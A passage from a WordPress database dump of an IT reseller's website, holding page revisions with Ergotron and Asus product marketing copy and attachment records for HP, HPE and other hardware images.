]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2112\">\r\n<div id=\"dnn_ctr2112_ContentPane\">\r\n<div id=\"dnn_ctr2112_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2112\" data-cb-id=\"2112\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<div class=\"row info-strip mgnbtm15\">\r\n<div class=\"item col-md-4 mgnbtm0-xs\">\r\n<div class=\"text-center mgnbtm10 mgntop10\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2018-12-18 23:15:29','2018-12-18 15:15:29','',1483,'https://bintara.com.my/blog/2018/12/18/1483-revision-v1/',0,'revision','',0),(2499,1,'2018-12-18 23:13:19','2018-12-18 15:13:19','<h2 class=\"h4\"><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n\r\n<h3 class=\"text-center mgnbtm2\">Why Choose Ergotron?</h3>\r\n<ol>\r\n 	<li><strong>Ergonomics</strong><img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-ergonomics.png\" /></li>\r\n</ol>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n\r\n2. <strong>Environment</strong><img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-environment.png\" />\r\n\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n\r\n3. <strong>Research</strong>Â  Â  Â <img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-research2.png\" />\r\n\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n\r\n4. <strong>Quality Tested</strong>Â Â <img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-quality.png\" />\r\n\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n\r\n5. <strong>Patents</strong>Â  Â  Â  Â <img src=\"https://www.ergotron.com/portals/0/images/icons/icon-cf.png\" />\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2294\">\r\n<div class=\"container-top-margin\">\r\n<div id=\"dnn_ctr2294_ContentPane\">\r\n<div id=\"dnn_ctr2294_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2294\" data-cb-id=\"2294\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<p class=\"intro\">Ergotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.</p>\r\n\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n<p class=\"h3 ng-binding ng-scope\">1. WorkFit-Z MiniÂ <img class=\"alignnone wp-image-2486\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"166\" height=\"167\" /></p>\r\n\r\n<div class=\"main\">\r\n<div class=\"ng-binding\">\r\n\r\nMake your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n\r\n2.Â WorkFit-TL, Standing Desk WorkstationÂ <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n\r\nPresenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n\r\n3.Â WorkFit-S,Â Dual Workstation with WorksurfaceÂ Â <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" width=\"175\" height=\"175\" />\r\n\r\nThis easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">LX Desk Monitor ArmÂ <img class=\"alignnone  wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\" width=\"148\" height=\"148\" /></li>\r\n</ol>\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n\r\n2.Â LX Dual Stacking ArmÂ  Â <img class=\"alignnone  wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" width=\"174\" height=\"174\" />\r\n\r\nCreate a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n\r\n3.Â LX Wall Monitor ArmÂ  Â <img class=\"alignnone  wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n<h3 class=\"tab accordian ng-binding active\" style=\"text-align: left;\" tabindex=\"0\" role=\"tab\" aria-controls=\"panel1\">Product Benefits</h3>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n<h1>Mobile Carts</h1>\r\nPersonalize an AV, computer or laptop cart to suit your workflow requirements.\r\n<h4>Mobile Workstations</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">WorkFit-C, Single LD Sit-Stand WorkstationÂ <img class=\"alignnone  wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"145\" height=\"145\" /></li>\r\n</ol>\r\nThis computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n\r\n2.Â WorkFit-C, Dual Sit-Stand WorkstationÂ <img class=\"alignnone  wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"148\" height=\"148\" />\r\n\r\nThis innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n\r\n3.Â Neo-FlexÂ® Laptop CartÂ <img class=\"alignnone  wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" width=\"151\" height=\"150\" />\r\n\r\nThis secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n<h4>Medical Carts</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">StyleViewÂ® Laptop Cart, SV40Â <img class=\"alignnone  wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\" width=\"159\" height=\"159\" /></li>\r\n</ol>\r\nIncredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n\r\n2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, PoweredÂ <img class=\"alignnone  wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" alt=\"\" width=\"160\" height=\"159\" />\r\n\r\nExpand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n\r\n3.Â StyleViewÂ® Telemedicine Cart, PoweredÂ <img class=\"alignnone  wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\" width=\"148\" height=\"149\" />\r\n\r\nThe modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n\r\n4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â <img class=\"alignnone  wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\" width=\"157\" height=\"158\" />\r\n\r\nThe ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2112\">\r\n<div id=\"dnn_ctr2112_ContentPane\">\r\n<div id=\"dnn_ctr2112_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2112\" data-cb-id=\"2112\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<div class=\"row info-strip mgnbtm15\">\r\n<div class=\"item col-md-4 mgnbtm0-xs\">\r\n<div class=\"text-center mgnbtm10 mgntop10\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2018-12-18 23:13:19','2018-12-18 15:13:19','',1483,'https://bintara.com.my/blog/2018/12/18/1483-revision-v1/',0,'revision','',0),(2502,1,'2018-12-18 23:19:27','2018-12-18 15:19:27','','HP DesignJet T120 Printer','','inherit','closed','closed','','hp-designjet-t120-printer','','','2018-12-18 23:19:27','2018-12-18 15:19:27','',1528,'https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T120-Printer.jpg',0,'attachment','image/jpeg',0),(2505,1,'2018-12-18 23:25:25','2018-12-18 15:25:25','','HP DesignJet T3500 Production Multifunction Printer','','inherit','closed','closed','','hp-designjet-t3500-production-multifunction-printer','','','2018-12-18 23:25:25','2018-12-18 15:25:25','',1528,'https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T3500-Production-Multifunction-Printer.jpg',0,'attachment','image/jpeg',0),(2504,1,'2018-12-18 23:23:24','2018-12-18 15:23:24','','HP DesignJet T830 Multifunction Printer series','','inherit','closed','closed','','hp-designjet-t830-multifunction-printer-series','','','2018-12-18 23:23:24','2018-12-18 15:23:24','',1528,'https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T830-Multifunction-Printer-series.jpg',0,'attachment','image/jpeg',0),(2507,1,'2018-12-18 23:28:52','2018-12-18 15:28:52','','HP DesignJet Z6810 Production Printer series','','inherit','closed','closed','','hp-designjet-z6810-production-printer-series','','','2018-12-18 23:28:52','2018-12-18 15:28:52','',1528,'https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6810-Production-Printer-series.jpg',0,'attachment','image/jpeg',0),(2506,1,'2018-12-18 23:27:44','2018-12-18 15:27:44','','HP DesignJet Z6610 Production Printer','','inherit','closed','closed','','hp-designjet-z6610-production-printer','','','2018-12-18 23:27:44','2018-12-18 15:27:44','',1528,'https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6610-Production-Printer.jpg',0,'attachment','image/jpeg',0),(2509,1,'2018-12-18 23:30:15','2018-12-18 15:30:15','','HPE ProLiant DL325 Gen10 Server','','inherit','closed','closed','','hpe-proliant-dl325-gen10-server','','','2018-12-18 23:30:15','2018-12-18 15:30:15','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png',0,'attachment','image/png',0),(2578,1,'2018-12-19 16:45:59','2018-12-19 08:45:59','<h2>NOTEBOOK</h2>\r\n<table style=\"height: 217px;\" width=\"1104\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2553 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-13-UX331UN.jpg\" alt=\"\" width=\"173\" height=\"173\" />\r\n<p style=\"text-align: center;\"><strong>ASUS ZenBook 13 UX331UN</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2555 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg\" alt=\"\" width=\"192\" height=\"192\" /><strong style=\"font-family: inherit; font-size: inherit;\">ASUS ZenBook Flip S UX370UA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone  wp-image-2556\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Transformer-Book-T101HA.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Transformer Book T101HA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>MONITOR</h2>\r\n<table style=\"height: 781px;\" width=\"578\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2558 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP278H.jpg\" alt=\"\" width=\"189\" height=\"189\" /></p>\r\n<p style=\"text-align: center;\"><strong>VP278H</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">&nbsp;\r\n\r\n<img class=\" wp-image-2565 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VZ249H.jpg\" alt=\"\" width=\"171\" height=\"171\" />\r\n<p style=\"text-align: center;\"><strong>VZ249H</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2562 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VA326H.jpg\" alt=\"\" width=\"193\" height=\"193\" />\r\n<p style=\"text-align: center;\"><strong>VA326H</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2563 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VC239H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VC239H</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"wp-image-2561 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA329Q.jpg\" alt=\"\" width=\"178\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>PA329Q</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2564 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP228HE.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n<p style=\"text-align: center;\"><strong>VP228HE</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"></p>\r\n<p style=\"text-align: center;\"><img class=\"alignnone  wp-image-2566\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MB169B-1.jpg\" alt=\"\" width=\"284\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>MB169B+</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>DESKTOP</h2>\r\n<table style=\"height: 887px;\" width=\"645\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2567 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUSPRO-E520.jpg\" alt=\"\" width=\"167\" height=\"167\" />\r\n<p style=\"text-align: center;\"><strong>ASUSPRO E520</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2568 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Chromebox-3.jpg\" alt=\"\" width=\"164\" height=\"164\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Chromebox 3</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"></p>\r\n&nbsp;\r\n\r\n<img class=\"wp-image-2577 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB60.jpg\" alt=\"\" width=\"216\" height=\"83\" />\r\n<p style=\"text-align: center;\"><strong>Mini PC PB60</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2572 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MINI-PC-PN60.jpg\" alt=\"\" width=\"186\" height=\"186\" /></p>\r\n<p style=\"text-align: center;\"><strong>MINI PC PN60</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2570 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB40.jpg\" alt=\"\" width=\"183\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>Mini PC PB40</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"wp-image-2573 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN65U.jpg\" alt=\"\" width=\"172\" height=\"172\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN65U</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2576 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C1.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C1</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2575 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C.jpg\" alt=\"\" width=\"183\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2574 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN68U.jpg\" alt=\"\" width=\"184\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN68U</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Asus','','inherit','closed','closed','','1442-revision-v1','','','2018-12-19 16:45:59','2018-12-19 08:45:59','',1442,'https://bintara.com.my/blog/2018/12/19/1442-revision-v1/',0,'revision','',0),(2523,1,'2018-12-18 23:41:48','2018-12-18 15:41:48','','HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch','','inherit','closed','closed','','hpe-altoline-6921-48sfp-6qsfp-x86-onie-ac-back-to-front-switch','','','2018-12-18 23:41:48','2018-12-18 15:41:48','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png',0,'attachment','image/png',0),(2511,1,'2018-12-18 23:30:52','2018-12-18 15:30:52','','HPE ProLiant DL385 Gen10 Server','','inherit','closed','closed','','hpe-proliant-dl385-gen10-server','','','2018-12-18 23:30:52','2018-12-18 15:30:52','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png',0,'attachment','image/png',0),(2514,1,'2018-12-18 23:33:34','2018-12-18 15:33:34','','HPE ProLiant ML350 Gen10 Server','','inherit','closed','closed','','hpe-proliant-ml350-gen10-server','','','2018-12-18 23:33:34','2018-12-18 15:33:34','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png',0,'attachment','image/png',0),(2512,1,'2018-12-18 23:31:35','2018-12-18 15:31:35','','HPE Apollo 6000 Chassis','','inherit','closed','closed','','hpe-apollo-6000-chassis','','','2018-12-18 23:31:35','2018-12-18 15:31:35','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png',0,'attachment','image/png',0),(2513,1,'2018-12-18 23:32:19','2018-12-18 15:32:19','','HPE ProLiant ML110 Gen10 Server','','inherit','closed','closed','','hpe-proliant-ml110-gen10-server','','','2018-12-18 23:32:19','2018-12-18 15:32:19','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png',0,'attachment','image/png',0),(2517,1,'2018-12-18 23:36:04','2018-12-18 15:36:04','','HPE StoreOnce Systems','','inherit','closed','closed','','hpe-storeonce-systems','','','2018-12-18 23:36:04','2018-12-18 15:36:04','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png',0,'attachment','image/png',0),(2515,1,'2018-12-18 23:34:24','2018-12-18 15:34:24','','HPE Synergy 12000 Frame','','inherit','closed','closed','','hpe-synergy-12000-frame','','','2018-12-18 23:34:24','2018-12-18 15:34:24','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png',0,'attachment','image/png',0),(2516,1,'2018-12-18 23:35:19','2018-12-18 15:35:19','','HPE Synergy D3940 Storage Module','','inherit','closed','closed','','hpe-synergy-d3940-storage-module','','','2018-12-18 23:35:19','2018-12-18 15:35:19','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png',0,'attachment','image/png',0),(2520,1,'2018-12-18 23:38:47','2018-12-18 15:38:47','','HPE FLexNetwork MSR95x Router Series','','inherit','closed','closed','','hpe-flexnetwork-msr95x-router-series','','','2018-12-18 23:38:47','2018-12-18 15:38:47','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png',0,'attachment','image/png',0),(2518,1,'2018-12-18 23:36:57','2018-12-18 15:36:57','','HPE 3PAR StoreServ 8000 Storage','','inherit','closed','closed','','hpe-3par-storeserv-8000-storage','','','2018-12-18 23:36:57','2018-12-18 15:36:57','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png',0,'attachment','image/png',0),(2519,1,'2018-12-18 23:37:48','2018-12-18 15:37:48','','HPE 3PAR StoreServ 9000 Storage','','inherit','closed','closed','','hpe-3par-storeserv-9000-storage','','','2018-12-18 23:37:48','2018-12-18 15:37:48','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png',0,'attachment','image/png',0),(2521,1,'2018-12-18 23:39:28','2018-12-18 15:39:28','','Alcatel-Lucent 7750 Service Router Series','','inherit','closed','closed','','alcatel-lucent-7750-service-router-series','','','2018-12-18 23:39:28','2018-12-18 15:39:28','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png',0,'attachment','image/png',0),(2522,1,'2018-12-18 23:40:36','2018-12-18 15:40:36','','HPE FlexNetwork MSR93x Router Series','','inherit','closed','closed','','hpe-flexnetwork-msr93x-router-series','','','2018-12-18 23:40:36','2018-12-18 15:40:36','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png',0,'attachment','image/png',0),(2524,1,'2018-12-18 23:42:24','2018-12-18 15:42:24','','HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch','','inherit','closed','closed','','hpe-altoline-6960-32qsfp28-x86-onie-ac-front-to-back-switch','','','2018-12-18 23:42:24','2018-12-18 15:42:24','',1529,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png',0,'attachment','image/png',0),(2527,1,'2018-12-19 11:26:44','2018-12-19 03:26:44','','PA-7080','','inherit','closed','closed','','pa-7080','','','2018-12-19 11:26:44','2018-12-19 03:26:44','',1569,'https://bintara.com.my/wp-content/uploads/2018/12/PA-7080.jpg',0,'attachment','image/jpeg',0),(2532,1,'2018-12-19 11:40:39','2018-12-19 03:40:39','','32 CJG5 Curved Gaming Monitor','','inherit','closed','closed','','32-cjg5-curved-gaming-monitor','','','2018-12-19 11:40:39','2018-12-19 03:40:39','',1580,'https://bintara.com.my/wp-content/uploads/2018/12/32-CJG5-Curved-Gaming-Monitor.png',0,'attachment','image/png',0),(2528,1,'2018-12-19 11:28:20','2018-12-19 03:28:20','','PA-5250','','inherit','closed','closed','','pa-5250','','','2018-12-19 11:28:20','2018-12-19 03:28:20','',1569,'https://bintara.com.my/wp-content/uploads/2018/12/PA-5250.jpg',0,'attachment','image/jpeg',0),(2529,1,'2018-12-19 11:32:22','2018-12-19 03:32:22','','PA-7000','','inherit','closed','closed','','pa-7000','','','2018-12-19 11:32:22','2018-12-19 03:32:22','',1569,'https://bintara.com.my/wp-content/uploads/2018/12/PA-7000.jpg',0,'attachment','image/jpeg',0),(2533,1,'2018-12-19 11:41:36','2018-12-19 03:41:36','','24 Curved Gaming Monitor CFG73','','inherit','closed','closed','','24-curved-gaming-monitor-cfg73','','','2018-12-19 11:41:36','2018-12-19 03:41:36','',1580,'https://bintara.com.my/wp-content/uploads/2018/12/24-Curved-Gaming-Monitor-CFG73.png',0,'attachment','image/png',0),(2534,1,'2018-12-19 11:42:01','2018-12-19 03:42:01','','34 Curved Widescreen Monitor','','inherit','closed','closed','','34-curved-widescreen-monitor','','','2018-12-19 11:42:01','2018-12-19 03:42:01','',1580,'https://bintara.com.my/wp-content/uploads/2018/12/34-Curved-Widescreen-Monitor.png',0,'attachment','image/png',0),(2535,1,'2018-12-19 11:43:05','2018-12-19 